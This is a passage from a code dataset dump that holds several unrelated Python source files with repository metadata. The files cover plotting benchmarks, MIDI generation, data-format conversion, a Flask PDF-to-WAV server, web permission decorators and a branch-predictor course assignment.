[\n \"Numpy\",\n \"Cupy\",\n #\"CupySerialSystem\",\n #\"CupyRaySystem\",\n \"CupyParallelSystem\",\n \"CupyNcclActorSystem\",\n]\n\n\ndef method2order(method):\n return method_order_list.index(method)\n\n\ndef method2color(method):\n return \"C%d\" % method_order_list.index(method)\n\n\nshow_name_table = {\n #\"CupyRaySystem\": \"Cupy + ObjectStore\",\n \"CupyParallelSystem\": \"Ours (1 node, 4 GPUs)\",\n \"CupyNcclActorSystem\": \"Ours (2 nodes, 8 GPUs)\",\n}\n\n\ndef show_name(method):\n return show_name_table.get(method, method)\n\n\ndef draw_grouped_bar_chart(\n data,\n baseline=None,\n output=\"out.png\",\n yscale_log=False,\n yticks=None,\n y_max=None,\n legend_bbox_to_anchor=None,\n legend_nrow=None,\n figure_size=None,\n figax=None,\n draw_ylabel=True,\n draw_legend=True,\n data_error_bar=None,\n title=None,\n):\n \"\"\"\n Parameters\n data: OrderedDict[workload_name -> OrderedDict[method] -> cost]]\n \"\"\"\n width = 1\n gap = 1.5\n fontsize = 19\n xticks_font_size = fontsize - 2\n\n figure_size = figure_size or (11, 4)\n legend_bbox_to_anchor = legend_bbox_to_anchor or (0.45, 1.25)\n\n all_methods = set()\n legend_set = {}\n\n if figax is None:\n fig, ax = plt.subplots()\n axes = []\n axes.append(ax)\n else:\n # for drawing subplot\n ax = figax\n\n x0 = 0\n xticks = []\n xlabels = []\n\n workloads = list(data.keys())\n for wkl in workloads:\n ys = []\n colors = []\n\n methods = list(data[wkl].keys())\n\n if baseline in data[wkl]:\n baseline_cost = data[wkl][baseline]\n else:\n # normalize to best library\n baseline_cost = 1\n # for method in methods:\n # if data[wkl][method] < baseline_cost:\n # baseline_cost = data[wkl][method]\n\n methods.sort(key=lambda x: method2order(x))\n for method in methods:\n relative_speedup = data[wkl][method] / baseline_cost\n if yticks is None:\n ys.append(relative_speedup)\n else:\n ys.append(max(relative_speedup, yticks[0] * 1.1))\n colors.append(method2color(method))\n\n # draw the bars\n xs = np.arange(x0, x0 + len(ys))\n\n if data_error_bar:\n yerrs = [data_error_bar[wkl][method] for method in methods]\n bars = ax.bar(\n xs, ys, yerr=yerrs, width=width, color=colors, ecolor=\"dimgray\"\n )\n else:\n bars = ax.bar(xs, ys, width=width, color=colors)\n\n for method, bar_obj in zip(methods, bars):\n all_methods.add(method)\n if method not in legend_set:\n legend_set[method] = bar_obj\n\n # tick and label\n x0 += len(ys) + gap\n\n xticks.append(x0 - gap - len(ys) * width / 2.0 - width / 2.0)\n xlabels.append(show_name(wkl))\n\n ax.set_xticks(xticks)\n ax.set_xticklabels(xlabels, fontsize=xticks_font_size)\n plt.tick_params(axis=\"x\", which=\"both\", bottom=\"off\", top=\"off\")\n\n if draw_ylabel is True:\n ax.set_ylabel(\"Time Cost (s)\", fontsize=fontsize)\n elif isinstance(draw_ylabel, str):\n ax.set_ylabel(draw_ylabel, fontsize=fontsize)\n\n if yscale_log:\n ax.set_yscale(\"log\", basey=2)\n if yticks is not None:\n ax.set_yticks(yticks)\n if y_max:\n ax.set_ylim(top=y_max)\n\n from matplotlib.ticker import FormatStrFormatter\n\n ax.set_yticklabels(ax.get_yticks(), fontsize=fontsize)\n ax.yaxis.set_major_formatter(FormatStrFormatter(\"%.2f\"))\n ax.yaxis.grid(True)\n #ax.grid(True)\n ax.set_axisbelow(True) # grid lines are behind the rest\n ax.tick_params(bottom=False, top=False, right=False)\n\n # put legend outside the plot\n all_methods = list(all_methods)\n all_methods.sort(key=lambda x: method2order(x))\n\n ax.set_xlabel(\"Dataset Size\", fontsize=fontsize)\n ax.set_title(title, fontsize=fontsize, pad=60.0)\n\n if draw_legend:\n legend_nrow = legend_nrow or 2\n ncol = (len(all_methods) + legend_nrow - 1) // legend_nrow\n ax.legend(\n [legend_set[x] for x in all_methods],\n [show_name(x) for x in all_methods],\n fontsize=fontsize - 1,\n loc=\"upper center\",\n bbox_to_anchor=legend_bbox_to_anchor,\n ncol=ncol,\n handlelength=1.0,\n handletextpad=0.5,\n columnspacing=1.1,\n )\n\n if figax is None:\n fig.set_size_inches(figure_size)\n fig.savefig(output, bbox_inches=\"tight\")\n print(\"Output the plot to %s\" % output)\n\n\ndef read_data(in_file):\n data = {}\n\n for line in open(in_file):\n if line.startswith('#'):\n continue\n items = [x.strip() for x in line.split(\",\")]\n library, N, cost, cv = items\n N, cost, cv = [eval(x) for x in [N, cost, cv]]\n\n gb = N * 1000 * 4 / 1e9\n if gb < 1:\n workload_name = \"%.1f GB\" % gb\n else:\n workload_name = \"%.0f GB\" % gb\n\n if cost < 0:\n continue\n if library not in method_order_list:\n continue\n\n if workload_name not in data:\n data[workload_name] = {}\n\n data[workload_name][library] = cost\n\n return data\n\n\nif __name__ == \"__main__\":\n data = read_data(\"result_bop.csv\")\n draw_grouped_bar_chart(\n data, legend_nrow=1, title=\"Compute $X^TX$\",\n output=\"bop.png\",\n yscale_log=True,\n yticks=[0.0625, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0],\n )\n\n data = read_data(\"result_lr.csv\")\n draw_grouped_bar_chart(\n data, legend_nrow=1, title=\"One Logistic Regression Training Step\",\n output=\"lr.png\",\n yscale_log=True,\n yticks=[0.0625, 0.125, 0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0, 32.0],\n )\n","repo_name":"merrymercy/nums","sub_path":"scripts/plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"41842851751","text":"import mido\nfrom mido import MidiFile, MidiTrack, Message\nimport numpy as np\n\ndef grayscale_to_midi(image, output_file):\n with MidiFile() as midi_file:\n track = MidiTrack()\n midi_file.tracks.append(track)\n\n for row in image:\n for pixel_value in row:\n # Map pixel brightness to pitch\n pitch = int(np.interp(pixel_value, [0, 255], [40, 90]))\n\n # Map pixel brightness to note duration (arbitrary)\n duration = int(np.interp(pixel_value, [0, 255], [50, 200]))\n\n # Add a note message to the track\n track.append(Message('note_on', note=pitch, velocity=64, time=0))\n track.append(Message('note_off', note=pitch, velocity=64, time=duration))\n\n # Save the MIDI file\n midi_file.save(output_file)\n","repo_name":"fraking00/LinesToMusic","sub_path":"grayscaleToMidi.py","file_name":"grayscaleToMidi.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23673677188","text":"import sys\nimport numpy as np\nimport tables as tb\nimport netCDF4 as nc\n\ndef int2ymd(iyear):\n f, y = np.modf(iyear/10000.)\n d, m = np.modf(f*100)\n return (int(y), int(m), int(d*100))\n\n\ndef num2year(iyear):\n \"\"\"Numeric representation of year to decimal year.\"\"\"\n iyear = np.asarray([int(y) for y in iyear])\n fyear = lambda y, m, d: y + (m - 1)/12. + d/365.25\n ymd = [int2ymd(iy) for iy in iyear]\n return [fyear(y,m,d) for y,m,d in ymd]\n\n\nif len(sys.argv) < 3:\n raise IOError('need `input` and `output` file names!')\n\nfname_in = sys.argv[1]\nfname_out = sys.argv[2]\n\nh5f = tb.openFile(fname_in, 'r')\ntime = h5f.root.time_all[:]\nlon = h5f.root.lon[:]\nlat = h5f.root.lat[:]\ndh = h5f.root.dh_mean_all[:]\ndh_corr = h5f.root.dh_mean_corr_short_t9_all[:]\ndg = h5f.root.dg_mean_all[:]\nnt, ny, nx = dh.shape\n\ntime = num2year(time)\n#lon[lon>180] -= 360\n\nncf = nc.Dataset(fname_out, 'w', format='NETCDF4')\nncf.createDimension('time', nt)\nncf.createDimension('latitude', ny) \nncf.createDimension('longitude', nx)\n\ndh2 = ncf.createVariable('dh','f8',('time', 'latitude', 'longitude',))\ndh_corr2 = ncf.createVariable('dh_corr','f8',('time', 'latitude', 'longitude',))\ndg2 = ncf.createVariable('dg','f8',('time', 'latitude', 'longitude',))\ntime2 = ncf.createVariable('time','f8',('time',))\nlon2 = ncf.createVariable('longitude','f8',('longitude',))\nlat2 = ncf.createVariable('latitude','f8',('latitude',))\n\n\ndh[np.abs(dh)>5] = np.nan\ndh_corr[np.abs(dh_corr)>10] = np.nan\n\n'''\ndh[dh==0] = np.nan\ndh_corr[dh_corr==0] = np.nan\ndg[dg==0] = np.nan\n'''\ndh[np.isnan(dh)] = 0\ndh_corr[np.isnan(dh_corr)] = 0\ndg[np.isnan(dg)] = 0 \n\ndh2[:] = dh[:]\ndh_corr2[:] = dh_corr[:]\ndg2[:] = dg[:]\ntime2[:] = time[:]\nlon2[:] = lon[:]\nlat2[:] = lat[:]\n\nh5f.close()\nncf.close()\n","repo_name":"fspaolo/misc-code","sub_path":"misc/hdf2nc.py","file_name":"hdf2nc.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"9297870652","text":"\"\"\"\nFunctions for pre-processing of data.\n\"\"\"\nimport logging\nfrom typing import Union\nimport pandas as pd\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import utils as pipeline_utils\nfrom nowcastlib.pipeline.process import utils as process_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef preprocess_datasource(options: config.DataSource):\n \"\"\"\n Runs preprocessing on a given data source given options outlined\n in the input DataSource instance.\n\n Parameters\n ----------\n options : nowcastlib.pipeline.structs.config.DataSource\n\n Returns\n -------\n pandas.core.frame.DataFrame\n the resulting processed dataframe\n \"\"\"\n logger.debug(\"Preprocessing %s...\", options.name)\n index_field = next(field for field in options.fields if field.is_date)\n logger.debug(\"Reading file...\")\n data_df = pd.read_csv(\n options.path,\n usecols=[field.field_name for field in options.fields],\n index_col=index_field.field_name,\n parse_dates=False,\n comment=options.comment_format,\n )\n data_df.index = pd.to_datetime(data_df.index, format=index_field.date_format)\n data_df = data_df[ # pylint: disable=unsubscriptable-object\n ~data_df.index.duplicated(keep=\"last\")\n ]\n data_df.sort_index(inplace=True)\n for field in options.fields:\n logger.debug(\"Processing field %s of %s...\", field.field_name, options.name)\n proc_options = field.preprocessing_options\n if proc_options is not None:\n # next two lines handle whether user wishes to overwrite field or not\n computed_field_name = pipeline_utils.build_field_name(\n proc_options, field.field_name\n )\n data_df[computed_field_name] = data_df[field.field_name].copy()\n data_df[computed_field_name] = process_utils.process_field(\n data_df[computed_field_name], proc_options, True\n )\n logger.debug(\"Dropping NaNs...\")\n data_df = data_df.dropna()\n if options.preprocessing_output is not None:\n logger.debug(\"Serializing preprocessing output...\")\n pipeline_utils.handle_serialization(data_df, options.preprocessing_output)\n return data_df\n\n\ndef preprocess_dataset(options: config.DataSet):\n \"\"\"\n Runs preprocessing on a given set of data sources given options outlined\n in the input DataSet instance.\n\n Parameters\n ----------\n options : nowcastlib.pipeline.structs.config.DataSet\n\n Returns\n -------\n list[pandas.core.frame.DataFrame]\n list containing each of the resulting processed dataframes\n \"\"\"\n logger.info(\"Preprocessing dataset...\")\n processed_dfs = []\n for ds_config in options.data_sources:\n processed_dfs.append(preprocess_datasource(ds_config))\n logger.info(\"Dataset preprocessing complete.\")\n return processed_dfs\n","repo_name":"thesofakillers/nowcastlib","sub_path":"nowcastlib/pipeline/process/preprocess/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13769226372","text":"# Задайте список из произвольных вещественных чисел, количество задаёт пользователь.\n# Напишите программу, которая найдёт разницу между максимальным и минимальным значением дробной части элементов.\nimport random\n\ndef random_list_without_int (a):\n spisok = []\n for i in range(a):\n spisok.append(round(random.uniform(0, 10),2))\n print(spisok)\n for i in range(len(spisok)):\n spisok[i] = round(spisok[i]%1,2)\n print(spisok)\n return spisok\n\ndef min_max_diff_in_list (list):\n min = list[0]\n max = list[0]\n differ = 0\n for i in range(len(list)):\n if min > list[i]:\n min = list[i]\n if max < list[i]:\n max = list[i]\n differ = max - min\n print(f'Min = {min}, Max = {max}, Difference = {round(differ,2)}')\n return min, max, differ\n\n\nn = int(input('введите количество элементов в списке '))\n\nmin_max_diff_in_list(random_list_without_int(n))","repo_name":"GadisovTmr/pythonStudy","sub_path":"All/practic/dz3/task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5499251716","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport logging\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\ndef show_statistics(encoded_dataset, dataset_name):\n all_lens = [item['metadata']['len'] for item in encoded_dataset]\n all_lens = pd.Series(all_lens, dtype=int)\n logger.info(f\"length of {dataset_name}: {str(all_lens.describe())}\")","repo_name":"HKUNLP/icl-ceil","sub_path":"src/utils/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"28194840889","text":"from functools import wraps\nfrom fastapi import HTTPException\n\ndef owner_or_superuser_access(model_param_name, user_param_name):\n \"\"\"\n У функции должны присуствовать два параметра 'user' и 'model_name'\n Проверяется равенство 'model_name.advertisement == user.id'\n при несовпадении выдает ошибку отсутствия доступа\n \"\"\"\n def decor(func):\n @wraps(func)\n async def wrapper(*args, **kwargs):\n advertisement = kwargs.get(model_param_name)\n user = kwargs.get(user_param_name)\n if advertisement.user.id != user.id and not user.is_superuser:\n raise HTTPException(status_code=401, detail=\"You have no access\")\n return await func(*args, **kwargs)\n return wrapper\n return decor\n\ndef not_banned_access(func):\n \"\"\"\n Проверка забанен ли пользователь\n \"\"\"\n @wraps(func)\n async def wrapper(*args, **kwargs):\n user = kwargs.get('user')\n if user.is_banned:\n raise HTTPException(status_code=401, detail=\"You profile is banned\")\n return await func(*args, **kwargs)\n return wrapper\n\ndef superuser_access(func):\n \"\"\"\n Проверка прав суперпользователя\n \"\"\"\n @wraps(func)\n async def wrapper(*args, **kwargs):\n user = kwargs.get('user')\n if not user.is_superuser:\n raise HTTPException(status_code=401, detail=\"You need superuser access\")\n return await func(*args, **kwargs)\n return wrapper","repo_name":"ilnar1995/fastapi_advertisements1","sub_path":"src/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34906003594","text":"from matplotlib import pyplot as plt\nimport csv\n\n\ncolors=['b', 'g', 'r']\ndata=[[], [], []]\nj=2\nif j==0:\n stringy=\"Mass (Solar)\"\n bins=[90, 95, 99]\nif j==1:\n stringy=\"Age (GYR)\"\n bins=[100, 100, 100]\nif j==2:\n stringy=\"Temperature (Kelvin)\"\n bins=[list(range(0, 2550, 150))+[2550], list(range(0, 2550, 150))+[2550], list(range(0, 2550, 150))+[2550]]\ni=\"0.5\"\nmodel_string= \"saumonmarley2008\"\nbirthrate= \"const\"\ns1=model_string+\"_\"+i+\"_\"+birthrate\nstring=\"/Users/yadukrishnaraghu/Files/Research/Brown-Dwarf-Simulation-Code-main/Essential-Simulation-Files/Bin/\"+s1\nstring1=string+\"_1.txt\"\nstring2=string+\"_2.txt\"\nstring3=string+\"_3.txt\"\nwith open(string1, mode='r') as employee_file:\n read = csv.reader(employee_file)\n for i in read:\n data[0].append(float(i[j]))\n\nwith open(string2, mode='r') as employee_file:\n read = csv.reader(employee_file)\n for i in read:\n data[1].append(float(i[j]))\n\nwith open(string3, mode='r') as employee_file:\n read = csv.reader(employee_file)\n for i in read:\n data[2].append(float(i[j]))\n\n\n\n\nplt.hist(data[0], histtype='step', bins=bins[0], color=\"black\")\nplt.hist(data[1], histtype='step', bins=bins[1], color=\"blue\")\nplt.hist(data[2], histtype='step', bins=bins[2], color=\"red\")\nplt.grid()\nplt.xlabel(stringy)\nplt.ylabel('Number')\nplt.gca().invert_xaxis()\nplt.title(s1)\n\nplt.show()","repo_name":"jgrigorian23/Brown-Dwarf-Simulation-Code","sub_path":"Essential/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3031712023","text":"import logging\nimport os\nimport shutil\n\nimport albumentations as A\nfrom pytorch_lightning import Callback\n\n__all__ = [\n \"SavePolicy\",\n]\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SavePolicy(Callback):\n def __init__(self, dirpath=None, latest_policy_filename=\"latest.json\"):\n self.dirpath = dirpath or os.path.join(os.getcwd(), \"policy\")\n self.latest_policy_filepath = os.path.join(self.dirpath, latest_policy_filename)\n os.makedirs(self.dirpath, exist_ok=True)\n\n def on_epoch_end(self, trainer, pl_module):\n epoch = trainer.current_epoch\n datamodule = trainer.datamodule\n cfg = pl_module.cfg\n transform = pl_module.policy_model.create_transform(\n input_dtype=cfg.data.input_dtype,\n preprocessing_transforms=datamodule.get_preprocessing_transforms(),\n )\n policy_file_filepath = os.path.join(self.dirpath, f\"epoch_{epoch}.json\")\n A.save(transform, policy_file_filepath)\n shutil.copy2(policy_file_filepath, self.latest_policy_filepath)\n log.info(\n f\"Policy is saved to {policy_file_filepath}. \"\n f\"{self.latest_policy_filepath} now also contains this policy.\"\n )\n","repo_name":"albumentations-team/autoalbument","sub_path":"autoalbument/callbacks/save_policy.py","file_name":"save_policy.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"53"} +{"seq_id":"35048170096","text":"\nimport sys, os\n\n# Disable\n\nimport base64\nimport io\nimport PyPDF2\nfrom flask import Flask, request, jsonify, make_response\nfrom flask_cors import CORS\nfrom serverPdf2Wav import pdf2wavServer\nfrom cache.cache import RedisCache\nimport random\nimport ast\nimport string\nimport json\n\n\napplication = app = Flask(__name__)\nUserRegisterDB = RedisCache(\"127.0.0.1:6379\")\n\napp.config['UPLOAD_EXTENSIONS'] = ['.docx', '.doc', '.txt', '.pdf', '.html']\ncors = CORS(app)\n\n\ndef _build_cors_preflight_response():\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.add(\"Access-Control-Allow-Headers\", \"*\")\n response.headers.add(\"Access-Control-Allow-Methods\", \"*\")\n return response\n\n\n@app.route('/')\n@app.route('/register',methods=['POST'])\ndef register():\n if request.method == \"POST\":\n print(request.json)\n try:\n username = request.json['username']\n password = request.json['password']\n\n\n token = UserRegisterDB.put(username,password)\n return {\"username\":username ,\"password\":password,\"token\":token}\n\n except Exception as e:\n print (e)\n return jsonify(e)\n\n\ndef randomStringHash(N:int) -> str:\n\n sHash = ''.join(random.choices(string.ascii_uppercase + string.digits, k = N))\n return sHash\n\n\n\n@app.route('/pdf2wav', methods=['POST', 'OPTIONS'])\ndef extractwav():\n if request.method == 'OPTIONS':\n return _build_cors_preflight_response()\n\n elif request.method == 'POST':\n\n\n try:\n\n\n\n\n\n username, token = request.json['username'], request.json['token']\n\n\n\n\n\n is_registered = UserRegisterDB.validateToken(username, token)\n if not is_registered:\n\n return {\"TokenNotFound\":token}\n\n fPath = \"tmp_files/\"+randomStringHash(10)+\".wav\"\n\n\n\n pdfObj = PyPDF2.PdfFileReader(io.BytesIO(base64.b64decode(request.json['data'])))\n\n #Facade\n\n pdf2wavServerobj = pdf2wavServer(\"pdf\", \"wav\", \"bytes\", pdfObj,RedisCache(\"127.0.0.1:6379\"),fPath)\n\n response = pdf2wavServerobj.executePdfToWav()\n\n return response\n except Exception as e:\n print (e)\n return jsonify(e)\n else:\n return jsonify(\"server only allows POST\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"adiraokhoury/pdf2wav","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71872172649","text":"################################################################################\n# Segmentation algo. demo #\n# ============================================================================ #\n# export KEY=$(cat ~/.algorithmia/config \\ #\n# |grep api_key |awk '{print $3}' |sed 's/\"//g') #\n# export SERVER=$(cat ~/.algorithmia/config \\ #\n# |grep api_server |awk '{print $3}' |sed 's/\"//g') #\n# python3 example.py $KEY $SERVER test_images \"data://.my/test_images\" \\ #\n# \"data://.algo/nocturne/segment/temp\" result #\n# #\n# Phil Stubbings, ONS Data Science Campus. #\n################################################################################\n\nALGO=\"nocturne/segment/1397637817d54197cbe1d35a4eeb3c7fddc0f34a\"\n\nimport Algorithmia\nimport sys\nfrom algo_io import AlgoIO\napi_key, api_endpoint, local_src_dir, remote_src_dir, remote_dst_dir, \\\n local_dst_dir = sys.argv[1:]\n\nalgo_io = AlgoIO(api_key, api_endpoint)\nalgo_client = Algorithmia.client(api_key, api_endpoint)\n\n# 1. upload contents of local_src_dir to algorithmia data:// location.\nprint(\"uploading images...\")\nalgo_io.upload_dir(local_src_dir+\"/*\", remote_src_dir)\n\n# 2. invoke algo.\nprint(\"start image segmentation...\")\nalgo = algo_client.algo(ALGO).set_options(timeout=600, stdout=True)\nresult = algo.pipe(dict(src=remote_src_dir, dst=remote_dst_dir))\n\nprint(result.result)\nprint(result.metadata)\n\n# 3. stash results locally.\nprint(\"downloading results...\")\nalgo_io.download_dir(remote_dst_dir, local_dst_dir)\n\nprint(\"done.\")\n","repo_name":"datasciencecampus/algorithmia-segment","sub_path":"src/client/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13516694449","text":"import json\nfrom datetime import datetime\n\nfrom asgiref.sync import async_to_sync\nfrom channels.layers import get_channel_layer\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.forms.models import model_to_dict\n\nfrom .models import Performance, Venue\nfrom .serializers import PerformanceSerializerPlain\n\n\ndef broadcast_status():\n\n async_to_sync(get_channel_layer().group_send)(\n \"dashboard\",\n {\n \"type\": \"dashboard_message\",\n \"data\": json.dumps(build_dict(), cls=DjangoJSONEncoder),\n },\n )\n\n\ndef build_dict():\n data = {\"venues\": {}, \"global_time\": datetime.now()}\n for v in Venue.objects.all():\n performances = Performance.objects.filter(venue=v.id).order_by(\"planned_start\")\n serializer = PerformanceSerializerPlain(performances, many=True)\n # we have another time per event, calculated by the event model.\n data[\"venues\"][str(v.id)] = {\n \"venue\": model_to_dict(v),\n \"talks\": serializer.data,\n \"time\": v.event.current_time,\n }\n\n return data\n","repo_name":"Jugendhackt/fahrplanplusplus","sub_path":"production_control/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11413883835","text":"#Estructuras de computadoras 2\n#Jesus Zuñiga Mendez\n#B59084\n#Tarea # 1 Branch predictor\n#Escuela de ING ELECTRICA I Ciclo 2023 UCR\n\n\n#Predictor propuesto JZM2023\n#Explicacion del predictor\n #Sabemos que los saltos por lo general no se toman frecuentemente o se toman muy frecuentemente, \n #como por ejemplo en los bucles donde solo una vez de la n cantidad de veces que se hace el bucle \n #no toma el salto, además en el TRACER de ejmplo las direcciones del pc son decimales pero si se \n #convierten a binario se daran cuenta que son direcciones de 22 bits, por lo que este predictor\n #guarda en una tabla que se indexa segun los 12 ultimos bits de la palabra del pc si el salto\n #anterior se tomó o no y en otra tabla que indexa segun los 7 primeros bits de la palabra si se \n #tomo el salto o no con esto se logra abarcar la mayporia de bits de la palabra con el fin \n #de hacer un registro de pesos en el que se defina entre ambas tablas si el salto debe o no\n #ser tomado\nclass ie0521_bp:\n def __init__(self):\n self.auxiliar=0\n #Variables que ayudan a estimar el presupuesto utilizado\n self.presupuestoOtorgado = 65536\n self.presupuestoGastado = 0\n self.presupuestoSobrante = 0\n #variables que hardcodean el tamaño del predictor\n self.maxTamanioPC = 14 #Tamanio maximo de la palabra que se recibe en el pc, editar de ser necesario\n self.maxTamanioHistoria = 4 #Tamaño del forro del empaquetado\n #se calcula el tamanio de la tabla y se crea\n #|_____|Hisotria |\n #|PC_i |HisotriaPC_i|\n #| : : |\n #| : : |\n #|PC_n |HisotriaPC_n|\n self.tamanioTablas = 2**self.maxTamanioPC #cantidad de registros que se pueden almacenar en la tabla\n self.vectorHistoria = [0 for i in range(self.maxTamanioHistoria)]\n self.laTabla = [self.vectorHistoria for i in range(self.tamanioTablas)]\n #se calcula el presupuesgto\n self.presupuestoGastado = self.presupuestoGastado + (self.maxTamanioHistoria * self.tamanioTablas)\n self.presupuestoSobrante = self.presupuestoOtorgado - self.presupuestoGastado\n #Variables necesarias para devolver el resultado del predicto\n self.total_predictions = 0\n self.total_taken_pred_taken = 0\n self.total_taken_pred_not_taken = 0\n self.total_not_taken_pred_taken = 0\n self.total_not_taken_pred_not_taken = 0\n ###########\n def print_info(self):\n print(\"Parámetros del predictor:\")\n print(\"\\tTipo de predictor:\\t\\t\\tJZMFilter2023BP\")\n print(\"\\tBits del PC para indexar:\\t\\t\\t\"+str(self.maxTamanioPC))\n print(\"\\tTamaño de los registros de historia global:\\t\"+str(self.maxTamanioHistoria))\n print(\"Informacion sobre presupuesto: \")\n self.printPresupuesto()\n ######### \n def print_stats(self):\n print(\"Resultados de la simulación\")\n print(\"\\t# branches:\\t\\t\\t\\t\\t\\t\"+str(self.total_predictions))\n print(\"\\t# branches tomados predichos correctamente:\\t\\t\"+str(self.total_taken_pred_taken))\n print(\"\\t# branches tomados predichos incorrectamente:\\t\\t\"+str(self.total_taken_pred_not_taken))\n print(\"\\t# branches no tomados predichos correctamente:\\t\\t\"+str(self.total_not_taken_pred_not_taken))\n print(\"\\t# branches no tomados predichos incorrectamente:\\t\"+str(self.total_not_taken_pred_taken))\n perc_correct = 100*(self.total_taken_pred_taken+self.total_not_taken_pred_not_taken)/self.total_predictions\n formatted_perc = \"{:.3f}\".format(perc_correct)\n print(\"\\t% predicciones correctas:\\t\\t\\t\\t\"+str(formatted_perc)+\"%\")\n ##########\n def predict(self, PC):\n #se calcula el tamanio de la pc evaluada para ajustarla al maxTamanioPalabra\n indexPC = int(PC) % self.tamanioTablas\n ##se dezplaza el registro de historia actualizando segun el resultado\n historiaPC = self.laTabla[indexPC]\n copiaHistoria= historiaPC.copy()\n prediccion = \"N\"\n rve = 5\n for i in range(len(copiaHistoria)):\n if i == 0:\n rve = copiaHistoria[i] + copiaHistoria[i+1]\n elif i > 1:\n rve = rve + copiaHistoria[i]\n\n if rve == 0:\n tamanioVector = len(copiaHistoria)\n final = tamanioVector - 1\n if (copiaHistoria[final] == -1) and (copiaHistoria[final-1] == -1):\n prediccion = \"N\"\n elif(copiaHistoria[final] == 1) and (copiaHistoria[final-1] == -1):\n prediccion = \"N\"\n elif(copiaHistoria[final] == -1) and (copiaHistoria[final-1] == 1):\n prediccion = \"T\"\n elif(copiaHistoria[final] == 1) and (copiaHistoria[final-1] == 1):\n prediccion = \"T\"\n else:\n prediccion = \"N\"\n elif rve > 0:\n prediccion = \"T\"\n else:\n prediccion = \"N\"\n return prediccion\n ##########\n def update(self, PC, result, prediction):\n #se calcula el tamanio de la pc evaluada para ajustarla al maxTamanioPalabra\n indexPC = int(PC) % self.tamanioTablas\n ##se dezplaza el registro de historia actualizando segun el resultado\n historiaPC = self.laTabla[indexPC]\n copiaHistoria= historiaPC.copy()\n bitGuardar = 0\n if result == \"T\":\n bitGuardar = 1\n if result == \"N\":\n bitGuardar = -1\n for i in range(len(copiaHistoria)):\n if i < (len(copiaHistoria) - 1):\n copiaHistoria[i] = copiaHistoria[i+1]\n else:\n copiaHistoria[i] = bitGuardar\n self.laTabla[indexPC] = copiaHistoria\n #Update stats\n if result == \"T\" and result == prediction:\n self.total_taken_pred_taken += 1\n elif result == \"T\" and result != prediction:\n self.total_taken_pred_not_taken += 1\n elif result == \"N\" and result == prediction:\n self.total_not_taken_pred_not_taken += 1\n else:\n self.total_not_taken_pred_taken += 1\n self.total_predictions += 1\n\n #metodo auxiliar para ver el contenido de la historia en un index de la tabla\n def printTabla(self,index):\n print(\"imprimiendo la Historia en el indice \"+str(index))\n print(self.laTabla[index])\n #metodo auxiliar para ver el presupuesto estimado\n def printPresupuesto(self):\n print(\"Otorgado: \",end=\"\")\n print(self.presupuestoOtorgado,end=\" \")\n print(\"Gastado: \",end=\"\")\n print(self.presupuestoGastado,end=\" \")\n print(\"Sobrante: \",end=\"\")\n print(self.presupuestoSobrante,end=\"\\n\")\n #preuab grafica de pesos \n def pruebaPesos(self):\n lista = [\n [-1,-1,-1],\n [-1,-1,1],\n [-1,1,-1],\n [-1,1,1],\n [1,-1,-1],\n [1,-1,1],\n [1,1,-1],\n [1,1,1]]\n rve = 5\n for ii in range(len(lista)):\n vactor = lista[ii]\n for i in range(len(vactor)):\n if i == 0:\n rve = vactor[i] + vactor[i+1]\n elif i > 1:\n rve = rve + vactor[i]\n print (vactor, end=' ')\n print (rve, end='\\n')\n exit()\n\n\n","repo_name":"Jesus-Zuniga-Mendez/Backup_Proyects","sub_path":"Python/JesusZuñigaTarea1B59084/Modelo de un predictor de saltos/ie0521_bp.py","file_name":"ie0521_bp.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24776308189","text":"from django.urls import path\n\nfrom album.views import (\n CreateAlbumView,\n PublicAlbumListView,\n PublicAlbumDetailView,\n)\n\napp_name = 'album'\n\nurlpatterns = [\n path('new/', CreateAlbumView.as_view(), name='new'),\n path('', PublicAlbumListView.as_view(), name='index'),\n path('detail//', PublicAlbumDetailView.as_view(), 